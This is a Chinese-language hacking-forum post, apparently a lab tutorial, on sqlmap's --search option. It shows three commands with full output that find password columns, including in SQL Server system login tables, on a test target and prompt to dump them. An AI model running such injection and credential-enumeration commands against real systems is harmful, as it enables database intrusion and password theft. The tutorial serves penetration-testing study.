切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
285 SQLMAP 搜索[复制链接]
发表于 2012-10-7 21:20:33 | 显示全部楼层 |!read_mode!
搜索全部数据库中的columns 名字是pass
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -C 'pass'
  2. [01:14:22] [INFO] the back-end DBMS is Microsoft SQL Server
  3. web server operating system: Windows 2003
  4. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  5. back-end DBMS: Microsoft SQL Server 2000
  6. do you want sqlmap to consider provided column(s):
  7. [1] as LIKE column names
  8. [2] as exact column names (default)
  9. > 1
  10. [01:14:23] [INFO] fetching database names
  11. [01:14:23] [INFO] the SQL query used returns 5 entries
  12. [01:14:23] [INFO] resumed: "master"
  13. [01:14:23] [INFO] resumed: "model"
  14. [01:14:23] [INFO] resumed: "msdb"
  15. [01:14:23] [INFO] resumed: "pen"
  16. [01:14:23] [INFO] resumed: "tempdb"
  17. [01:14:24] [INFO] searching columns like 'pass' across all databases           
  18. [01:14:24] [INFO] the SQL query used returns 2 entries
  19. [01:14:24] [INFO] retrieved: "syslogins"
  20. [01:14:24] [INFO] retrieved: "sysoledbusers"
  21. [01:14:24] [INFO] the SQL query used returns 1 entries                        
  22. [01:14:24] [INFO] retrieved: "users"
  23. Columns like 'pass' were found in the following databases:                     
  24. Database: pen
  25. Table: dbo.users
  26. [1 column]
  27. +--------+
  28. | Column |
  29. +--------+
  30. | pass   |
  31. +--------+

  32. Database: master
  33. Table: dbo.sysoledbusers
  34. [1 column]
  35. +--------+
  36. | Column |
  37. +--------+
  38. | pass   |
  39. +--------+

  40. Database: master
  41. Table: dbo.syslogins
  42. [1 column]
  43. +--------+
  44. | Column |
  45. +--------+
  46. | pass   |
  47. +--------+

  48. do you want to dump entries? [Y/n]
复制代码

指定数据库搜索
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -D pen -C 'pass'
  2. [01:15:49] [INFO] the back-end DBMS is Microsoft SQL Server
  3. web server operating system: Windows 2003
  4. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  5. back-end DBMS: Microsoft SQL Server 2000
  6. do you want sqlmap to consider provided column(s):
  7. [1] as LIKE column names
  8. [2] as exact column names (default)
  9. > 1
  10. [01:15:49] [INFO] searching columns like 'pass' in database 'pen'
  11. [01:15:49] [INFO] the SQL query used returns 1 entries
  12. [01:15:49] [INFO] resumed: "users"
  13. Columns like 'pass' were found in the following databases:                     
  14. Database: pen
  15. Table: dbo.users
  16. [1 column]
  17. +--------+
  18. | Column |
  19. +--------+
  20. | pass   |
  21. +--------+

  22. do you want to dump entries? [Y/n]
复制代码

指定数据库和表搜索
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -D pen -T dbo.users -C 'pass'
  2. [01:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
  3. web server operating system: Windows 2003
  4. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  5. back-end DBMS: Microsoft SQL Server 2000
  6. do you want sqlmap to consider provided column(s):
  7. [1] as LIKE column names
  8. [2] as exact column names (default)
  9. > 1
  10. [01:16:56] [INFO] searching columns like 'pass' for table 'dbo.users' in database 'pen'
  11. [01:16:56] [INFO] the SQL query used returns 1 entries
  12. [01:16:56] [INFO] retrieved: "users"
  13. Columns like 'pass' were found in the following databases:                     
  14. Database: pen
  15. Table: dbo.users
  16. [1 column]
  17. +--------+
  18. | Column |
  19. +--------+
  20. | pass   |
  21. +--------+
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-20 19:06

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部